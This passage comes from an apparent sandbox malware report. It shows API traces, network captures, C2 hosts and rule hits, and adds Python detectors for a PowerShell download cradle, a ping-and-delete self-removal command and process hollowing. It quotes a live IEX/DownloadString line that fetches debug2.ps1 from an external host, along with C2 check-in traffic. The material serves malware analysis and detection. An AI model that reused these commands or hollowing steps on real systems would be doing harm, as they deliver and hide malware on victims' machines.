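The cmdline indicators above show the chain a detection engineer would key on: cmd.exe reached through the WoW64 sysnative alias (a 32-bit process launching the native 64-bit cmd.exe), a PowerShell IEX/DownloadString cradle fetching debug2.ps1 from sungeomatics.com, and a ping 127.0.0.1 && del one-liner that deletes the dropped postmon.exe after a short delay. The Python below is an added example, not from the report or from ZeroBOX, that runs those three rules over the command lines copied from this page plus one constructed benign line; the tag names are the example's own.

```python
"""Flag the cmd.exe/PowerShell command-line patterns seen in the report's process tree."""
import re

# Constructed sample: the four distinct cmdlines from the report above plus one benign control.
CMDLINES = [
    r'''C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"''',
    r'''powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')''',
    r'''C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL''',
    r'''C:\Windows\system32\cmd.exe /S /D /c" echo Y"''',
    r'''C:\Windows\System32\cmd.exe /c dir C:\Users''',  # constructed benign control
]

# IEX(New-Object Net.WebClient).DownloadString('<url>'): in-memory download cradle; captures the URL.
CRADLE_RE = re.compile(
    r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString\s*\(\s*['\"]([^'\"]+)['\"]\s*\)",
    re.IGNORECASE)
# ping 127.0.0.1 && del "<path>": ping used as a sleep, then the file is removed (self-delete idiom).
SELF_DELETE_RE = re.compile(
    r"ping\s+127\.0\.0\.1\s*&&\s*del\s+\"?([^\"]+?)\"?(?:\s*>>?\s*NUL)?\s*$", re.IGNORECASE)
# \sysnative\ is the WoW64 alias a 32-bit process uses to reach the 64-bit System32.
SYSNATIVE_RE = re.compile(r"\\sysnative\\", re.IGNORECASE)


def analyse(cmdline):
    """Return detection tags and extracted indicators for one command line."""
    tags, iocs = [], {}
    m = CRADLE_RE.search(cmdline)
    if m:
        tags.append("powershell_download_cradle")
        iocs["url"] = m.group(1)
    m = SELF_DELETE_RE.search(cmdline)
    if m:
        tags.append("ping_delay_self_delete")
        iocs["deleted_path"] = m.group(1)
    if SYSNATIVE_RE.search(cmdline):
        tags.append("wow64_sysnative_launch")
    return {"tags": tags, "iocs": iocs}


def triage(cmdlines):
    """Keep only the command lines that fired at least one rule, in input order."""
    return [(c, r) for c in cmdlines if (r := analyse(c))["tags"]]
```

triage(CMDLINES) keeps the first three lines: the sysnative launch carries both the cradle and the WoW64 tag with the .ps1 URL extracted, the bare powershell line carries the cradle alone, and the ping/del line yields the deleted path; the echo Y helper and the benign dir line fire nothing.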
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\sysnative\cmd.exe
parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
filepath: C:\Windows\sysnative\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 1495040
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received <binary TLS record, not printable; contains the TLS 1.3 downgrade-protection marker "DOWNGRD">
Data received <further binary TLS records, not printable>
Data received HTTP/1.1 200 OK Server: nginx Date: Sun, 25 Jun 2023 22:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 59 xZPbJglJY8GXNAUHUciy|6MdhbTcM|http://195.123.226.82/index.php|https://iplogger.com/1hKWS4 0
Data sent <binary TLS ClientHello, not printable; server_name extension carries sungeomatics.com>
Data sent <further binary TLS records, not printable>
Data sent GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1 Host: 195.123.226.82 Connection: Keep-Alive
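The last two lines are the one exchange on the page that is readable in the clear: a chunked HTTP 200 reply whose body is four pipe-separated fields (chunk size 0x59, 89 bytes), followed by a GET to the host named in the third field that carries the second field as subid. The Python below is an added example, not part of the report: it rebuilds that reply with CRLFs (same bytes as the flattened line above), de-chunks it, splits the fields and checks which of them reappear in the follow-up request. The field names token/subid/urls are the example's own labels, and the meaning of the id GUID is not stated on the page.

```python
"""De-chunk the plaintext reply and tie its fields to the follow-up GET seen in the report."""
from urllib.parse import urlsplit, parse_qs

# Reconstructed from the flattened "Data received" line above: same bytes, CRLFs re-inserted.
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Date: Sun, 25 Jun 2023 22:59:58 GMT\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"59\r\n"   # 0x59 = 89 bytes of body
    b"xZPbJglJY8GXNAUHUciy|6MdhbTcM|http://195.123.226.82/index.php|https://iplogger.com/1hKWS4\r\n"
    b"0\r\n\r\n"
)
# The request that followed, copied from the "Data sent" line above.
REQUEST_LINE = "GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1"
REQUEST_HOST = "195.123.226.82"


def dechunk(body):
    """Reassemble an RFC 7230 chunked body; chunk extensions and trailers are ignored."""
    out, pos = bytearray(), 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)
        pos = nl + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2            # skip the CRLF that ends each chunk


def parse_response(raw):
    """Split status line, headers and body; de-chunk when the server says so."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return status, headers, body


def parse_tasking(body):
    """Split the pipe-delimited body. Field names are assumptions; the report does not name them."""
    fields = body.decode("utf-8").split("|")
    return {"token": fields[0], "subid": fields[1], "urls": fields[2:]}


def correlate(tasking, request_line, host):
    """Check which fields of the reply reappear in the next request the sample sent."""
    path = request_line.split()[1]
    req = urlsplit("http://" + host + path)
    query = parse_qs(req.query)
    targets = [u for u in tasking["urls"]
               if urlsplit(u).netloc == req.netloc and urlsplit(u).path == req.path]
    return {
        "subid_reused": query.get("subid", [None])[0] == tasking["subid"],
        "target_from_tasking": targets[0] if targets else None,
        "victim_id": query.get("id", [None])[0],   # GUID; its meaning is not stated in the report
    }
```

parse_response(RESPONSE) yields an 89-byte body; parse_tasking splits it into the token, subid 6MdhbTcM and two URLs, and correlate confirms the GET went to http://195.123.226.82/index.php with the same subid, while the id GUID has no counterpart in the reply.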
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate privileges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x0000009c
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x0000009c
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360安全卫士
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360安全卫士
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x0000009c
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0
cmdline ping 127.0.0.1
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
wmi SELECT * FROM Win32_Processor
host 109.206.241.33
host 195.123.226.82
host 79.137.192.3
host 85.217.144.143
host 85.217.144.228
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2644
process_handle: 0x00000080
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: sod˜ÆÞæp°—#{úÚ(â'±Ïø«±ã|xéš/5 ÀÀÀ À 28.ÿsungeomatics.com  
socket: 1260
sent: 120
1 120 0

send

buffer: uàdÅëpì°â(¢ô»Ýûó΀<&ù©ÈÁJûÛ¢>Uöçì¡@xÊog¢€o؈ÄÜ¿ÂYÖ-NÎ6 …b âñþ“/+þ¿Œì@c»ýC…©Z '¥ûfŒZH±¸ÍC¥Ž;ܦs_Gm<2OÁ®HAX”Õ¥qÅÛøÿ½¡eø&0V)ËÅs®[±6ð¢c5Ÿ©Sƒdåã@˜ýۄÁš},ÅË£LZ@Yñì-™ôLÁ…š>½<_›Aw°Õä-Âii݄>Þz@ÆÀÒ®Nÿ]¶ý ÏZ²)FÈÅÈñ9’´_¼‡*¹|K,Œ*^7֔L ¼" 0ú!¸ª)ÂVñ¢¨ëpñfý0} XRӏU±«ËÓŒA³–˜E扣×Þ
socket: 1260
sent: 326
1 326 0

send

buffer: póÝþI+èº$ÿîc¯4ñï¡<1* ×h)z7ÊC¨µŸOîa-¾µBñ¶.v.;ϞæٗÂÿV ˆm™ÍŒÝø°öùԉw³ê›™käËý¥7&ÑVÁUô£ɋ ž<}œ½á5M»hç_íIx•'
socket: 1260
sent: 117
1 117 0

send

buffer: GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1 Host: 195.123.226.82 Connection: Keep-Alive
socket: 1684
sent: 128
1 128 0
Process injection Process 2524 called NtSetContextThread to modify thread in remote process 2644
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2644
1 0 0
Process injection Process 1452 resumed a thread in remote process 560
Process injection Process 2524 resumed a thread in remote process 2644
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000a88
suspend_count: 1
process_identifier: 560
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2644
1 0 0
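Analyst note, added to this page and not part of the ZeroBOX report: the NtSetContextThread and NtResumeThread rows above, together with the CreateProcessInternalW (CREATE_SUSPENDED), NtUnmapViewOfSection, NtAllocateVirtualMemory (PAGE_EXECUTE_READWRITE at 0x00400000) and WriteProcessMemory (0x7efde008) rows for PID 2644 later in the report, are the textbook process-hollowing sequence. The Python below replays those rows, transcribed by hand, through a small per-PID sequence detector. The WPSOffice_11.exe child (PID 560) is included as a control: it is also created with CREATE_SUSPENDED but is simply resumed, which is ordinary installer behaviour and must not be flagged. The PEB address and the reading of EAX as the new entry point are assumptions stated in the comments; the code is this note's own, not sandbox code.

```python
"""Process-hollowing detector over a sandbox API trace.

Added example; this is not ZeroBOX code and not part of the report above.
TRACE is transcribed from the report's CreateProcessInternalW,
NtUnmapViewOfSection, NtAllocateVirtualMemory, WriteProcessMemory,
NtSetContextThread and NtResumeThread rows for PID 2644 (toolspub1.exe) and
PID 560 (WPSOffice_11.exe); field names follow the report's own labels.
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004
PAGE_EXECUTE_READWRITE = 0x40
# Assumption: 32-bit Windows 7 guest where the PEB sits at 0x7efde000, so
# 0x7efde008 is PEB.ImageBaseAddress. The report shows WriteProcessMemory
# hitting exactly that address with a buffer rendered as "@" (0x40), which is
# consistent with the little-endian bytes of 0x00400000.
PEB_IMAGE_BASE = 0x7efde008

TRACE = [  # constructed from the report rows; order matters
    {"api": "CreateProcessInternalW", "process_identifier": 560,
     "filepath": r"C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe",
     "creation_flags": 67634196},            # includes CREATE_SUSPENDED
    {"api": "NtResumeThread", "process_identifier": 560},
    {"api": "CreateProcessInternalW", "process_identifier": 2644,
     "filepath": r"C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe",
     "creation_flags": 134217732},           # CREATE_NO_WINDOW|CREATE_SUSPENDED
    {"api": "NtUnmapViewOfSection", "process_identifier": 2644, "base_address": 0x00400000},
    {"api": "NtAllocateVirtualMemory", "process_identifier": 2644,
     "base_address": 0x00400000, "region_size": 36864, "protection": 64},
    {"api": "WriteProcessMemory", "process_identifier": 2644, "base_address": 0x7efde008},
    {"api": "NtSetContextThread", "process_identifier": 2644,
     "registers.eip": 1995571652, "registers.eax": 4206040},
    {"api": "NtResumeThread", "process_identifier": 2644},
]


def _inside(addr, regions):
    """True if addr falls inside any (base, size) region."""
    return any(base <= addr < base + size for base, size in regions)


def analyse(trace):
    """Return {pid: {"filepath", "stages", "hollowed"}} for every remote PID."""
    state = defaultdict(lambda: {"filepath": None, "stages": [], "rwx": [], "hollowed": False})
    for rec in trace:
        s, api = state[rec["process_identifier"]], rec["api"]
        if api == "CreateProcessInternalW":
            s["filepath"] = rec.get("filepath")
            if rec["creation_flags"] & CREATE_SUSPENDED:
                s["stages"].append("created_suspended")
        elif api == "NtUnmapViewOfSection":
            s["stages"].append("image_unmapped")
        elif api == "NtAllocateVirtualMemory" and rec["protection"] & PAGE_EXECUTE_READWRITE:
            s["rwx"].append((rec["base_address"], rec["region_size"]))
            s["stages"].append("rwx_allocated")
        elif api == "WriteProcessMemory":
            if rec["base_address"] == PEB_IMAGE_BASE:
                s["stages"].append("peb_imagebase_patched")
            elif _inside(rec["base_address"], s["rwx"]):
                s["stages"].append("rwx_written")
            else:
                s["stages"].append("remote_write")
        elif api == "NtSetContextThread":
            # Assumption: on x86 a suspended primary thread starts in ntdll's
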